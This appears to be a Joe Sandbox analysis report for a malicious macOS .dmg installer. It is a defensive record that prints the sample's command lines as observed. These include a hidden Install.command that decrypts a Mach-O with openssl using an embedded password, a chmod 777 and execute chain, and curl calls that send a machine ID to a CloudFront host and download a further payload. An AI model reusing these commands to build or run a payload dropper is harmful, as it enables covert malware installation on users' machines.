
Analysis Report G0Sr0fA5cv.dmg

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 102473
Start date: 14.05.2020
Start time: 11:20:22
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: G0Sr0fA5cv.dmg
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Detection: MAL
Classification: mal56.evad.macDMG@0/10@1/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 17.253.54.253, 17.253.54.251, 17.253.108.125, 17.253.54.125, 17.253.108.253
  • Excluded domains from analysis (whitelisted): time-macos.apple.com, time-osx.g.aaplimg.com

Detection

Strategy: Threshold
Score: 56
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Detection: malicious

Classification Spiderchart

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Techniques per tactic (trailing digits are the matched-signature counts shown in the original matrix):

  • Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services
  • Execution: Command-Line Interface 11; Scripting 11; Windows Management Instrumentation
  • Persistence: Hidden Files and Directories 1; Port Monitors; Accessibility Features
  • Privilege Escalation: Port Monitors; Accessibility Features; Path Interception
  • Defense Evasion: Hidden Files and Directories 1; Virtualization/Sandbox Evasion 1; Scripting 11
  • Credential Access: Credential Dumping; Network Sniffing; Input Capture
  • Discovery: Virtualization/Sandbox Evasion 1; Security Software Discovery 1; System Information Discovery 71
  • Lateral Movement: Remote File Copy 3; Remote Services; Windows Remote Management
  • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
  • Exfiltration: Data Encrypted 11; Exfiltration Over Other Network Medium; Automated Exfiltration
  • Command and Control: Standard Non-Application Layer Protocol 3; Standard Application Layer Protocol 13; Remote File Copy 3
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
  • Impact: Modify System Partition; Device Lockout; Delete Device Data

Signature Overview



Cryptography:

Encrypts data with the "openssl" command
  • Source: /bin/bash (PID: 18843) - Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ
  • Source: /bin/bash (PID: 18849) - Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2
Executes the "openssl" command used for cryptographic operations
  • Source: /bin/bash (PID: 18843) - Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ
  • Source: /bin/bash (PID: 18849) - Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2

Networking:

Downloads files from webservers via HTTP
  • Source: global traffic - HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */*
  • Source: global traffic - HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */*
  • Source: global traffic - HTTP traffic detected: GET /sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1 HTTP/1.0 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */*
  • Source: global traffic - HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */*
Performs DNS lookups
  • Source: unknown - DNS traffic detected: queries for: d1wkiebwu8q7qk.cloudfront.net
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
  • Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1245 Connection: close Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Thu, 14 May 2020 09:21:12 GMT X-Cache: Error from cloudfront Via: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: QTqhiTeBI0MnpH6TE-ieuK0urxyObER7GaCgBzr4TxQ9ixi25rXZbg==
Urls found in memory or binary data
  • Source: G0Sr0fA5cv.dmg - String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd

System Summary:

Classification label
  • Source: classification engine - Classification label: mal56.evad.macDMG@0/10@1/0

Persistence and Installation Behavior:

Executes hidden files
  • Source: /bin/bash (PID: 18828) - File in hidden directory executed: /Volumes/Install/.hidden/Install.command /Volumes/Install/.hidden/Install.command
Sets full permissions to files and/or directories
  • Source: /bin/bash (PID: 18852) - Chmod executable with 777: /bin/chmod -> chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2
Terminates several processes with shell command 'killall'
  • Source: /bin/bash (PID: 18845) - Killall command executed: killall Terminal
Executes commands using a shell command-line interpreter
  • Source: /usr/bin/nohup (PID: 18844) - Shell command executed: /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c for FILE in /Volumes/Install/.hidden/*.command do echo '${FILE}' break done
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c hdiutil info -plist | perl -0777pe 's|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs' | plutil -convert json -r -o - -- -
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1' > /dev/null 2>&1
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1' > /dev/null 2>&1
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C 'http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1' > /dev/null 2>&1
  • Source: /tmp/oVlTmrVXYMfG/Qqsz1P2 (PID: 18853) - Shell command executed: sh -c curl -L 'http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1' > /dev/null 2>&1
Executes the "chmod" command used to modify permissions
  • Source: /bin/bash (PID: 18852) - Chmod executable: /bin/chmod -> chmod 777 /tmp/oVlTmrVXYMfG/Qqsz1P2
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
  • Source: /bin/sh (PID: 18865) - Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1
  • Source: /bin/sh (PID: 18867) - Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1
  • Source: /bin/sh (PID: 18869) - Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1
  • Source: /bin/sh (PID: 18871) - Curl executable: /usr/bin/curl -> curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1
Executes the "grep" command used to find patterns in files or piped streams
  • Source: /bin/bash (PID: 18835) - Grep executable: /usr/bin/grep -> grep -Ev \.(command)$
Executes the "mkdir" command used to create folders
  • Source: /bin/bash (PID: 18825) - Mkdir executable: /bin/mkdir -> mkdir -m 700 -p /Users/ben/.bash_sessions
Executes the "mktemp" command used to create a temporary unique file name
  • Source: /bin/bash (PID: 18832) - Mktemp executable: /usr/bin/mktemp -> mktemp -d /tmp/XXXXXXXXXXXX
Executes the "nohup" (no hangup) command used to avoid a background terminal process from being killed
  • Source: /bin/bash (PID: 18844) - Nohup executable: /usr/bin/nohup -> nohup /bin/bash -c eval '$(echo 'openssl enc -aes-256-cbc -d -A -base64 -k \'$archive\' -in \'$appDir/$archive\' -out \'$tmpDir/$binFile\' xattr -c \'$tmpDir/\'* chmod 777 \'$tmpDir/$binFile\' \'$tmpDir/$binFile\' && rm -rf $tmpDir')'
Executes the "touch" command used to create files or modify time stamps
  • Source: /bin/bash (PID: 18827) - Touch executable: /usr/bin/touch -> /usr/bin/touch /Users/ben/.bash_sessions/6191FB1D-2813-41DB-BF02-7C8C726DDB8A.historynew
Many shell processes execute programs via the execve syscall (might be indicative of malicious behavior)
  • Source: /bin/sh (PID: 18854) - Shell process: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
  • Source: /bin/sh (PID: 18856) - Shell process: system_profiler SPHardwareDataType
  • Source: /bin/sh (PID: 18857) - Shell process: awk /UUID/ { print $3 }
  • Source: /bin/sh (PID: 18861) - Shell process: hdiutil info -plist
  • Source: /bin/sh (PID: 18862) - Shell process: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs
  • Source: /bin/sh (PID: 18863) - Shell process: plutil -convert json -r -o - -- -
  • Source: /bin/sh (PID: 18865) - Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1
  • Source: /bin/sh (PID: 18867) - Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1
  • Source: /bin/sh (PID: 18869) - Shell process: curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1
  • Source: /bin/sh (PID: 18871) - Shell process: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1
Queries for attached disk images with shell command 'hdiutil'
  • Source: /bin/sh (PID: 18861) - Hdiutil command executed: hdiutil info -plist
Writes 64-bit Mach-O files to disk
  • Source: /usr/bin/openssl (PID: 18849) - File written: /private/tmp/oVlTmrVXYMfG/Qqsz1P2
Writes Mach-O files to the tmp directory
  • Source: /usr/bin/openssl (PID: 18849) - 64-bit Mach-O written to tmp path: /private/tmp/oVlTmrVXYMfG/Qqsz1P2
Executes the "awk" command used to scan for patterns (typically in standard output)
  • Source: /bin/sh (PID: 18857) - Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }
Reads data from the local random generator
  • Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851) - Random device file read: /dev/urandom
  • Source: /usr/bin/perl5.18 (PID: 18862) - Random device file read: /dev/urandom
Uses the Python framework
  • Source: /usr/bin/xattr (PID: 18851) - Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python

Malware Analysis System Evasion:

Reads the sysctl hardware model value (might be used for detecting VM presence)
  • Source: /usr/sbin/system_profiler (PID: 18858) - Sysctl read request: hw.model (6.2)

Language, Device and Operating System Detection:

Queries the macOS product version
  • Source: /bin/sh (PID: 18854) - Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
Reads hardware related sysctl values
  • Source: /usr/sbin/system_profiler (PID: 18858) - Sysctl read request: hw.cpu_freq (6.15)
  • Source: /usr/sbin/system_profiler (PID: 18858) - Sysctl read request: hw.memsize (6.24)
Reads the system's OS release and/or type
  • Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851) - Sysctl requested: kern.ostype (1.1)
  • Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851) - Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
  • Source: /bin/bash (PID: 18822) - Sysctl requested: kern.hostname (1.10)
  • Source: /Volumes/Install/.hidden/Install.command (PID: 18828) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/bash (PID: 18844) - Sysctl requested: kern.hostname (1.10)
  • Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18854) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18855) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18859) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18860) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18864) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18866) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18868) - Sysctl requested: kern.hostname (1.10)
  • Source: /bin/sh (PID: 18870) - Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
  • Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
  • Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 18851) - System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Lowering of HIPS / PFW / Operating System Security Settings:

Executes the "defaults" command used to read or modify user-specific settings
  • Source: /bin/sh (PID: 18854) - Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

Stealing of Sensitive Information:

Executes the "system_profiler" command used to collect detailed system hardware and software information
  • Source: /bin/sh (PID: 18856) - System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType
  • Source: /usr/sbin/system_profiler (PID: 18856) - System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full

Malware Configuration

No configs have been found


Runtime Messages

Command: open "/Volumes/Install/Install" --args
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:

Standard Error:

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
Behavior Graph ID: 102473; Sample: G0Sr0fA5cv.dmg; Start date: 14/05/2020; Architecture: MAC; Score: 56

Network node: d1wkiebwu8q7qk.cloudfront.net, 13.225.73.108 (ports 49313, 49314, 49315), unknown, United States

Process tree recovered from the graph:

  • Terminal login -> login bash -> bash Install.command (Executes hidden files)
  • bash Install.command -> nohup bash -> Qqsz1P2; openssl (drops /private/tmp/oVlTmrVXYMfG/Qqsz1P2, Mach-O; Encrypts data with the "openssl" command); chmod (Sets full permissions to files and/or directories); 2 other processes
  • bash Install.command -> bash -> openssl, bash
  • bash Install.command -> killall (Terminates several processes with shell command 'killall')
  • bash Install.command -> 4 other processes -> bash -> dirname; 6 other processes
  • login bash -> bash -> date; login bash -> path_helper; login bash -> 2 other processes -> touch
  • Qqsz1P2 -> sh -> perl5.18, hdiutil, plutil
  • Qqsz1P2 -> sh -> system_profiler (-> system_profiler), awk
  • Qqsz1P2 -> sh -> curl; Qqsz1P2 -> 5 other processes -> curl, curl, curl

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match: 13.225.73.108
  • f_000418.exe (malicious)
  • https://download.filezilla-project.org/client/FileZilla_3.47.2.1_win64_sponsored-setup.exe (malicious)

Domains

No context

ASN


JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.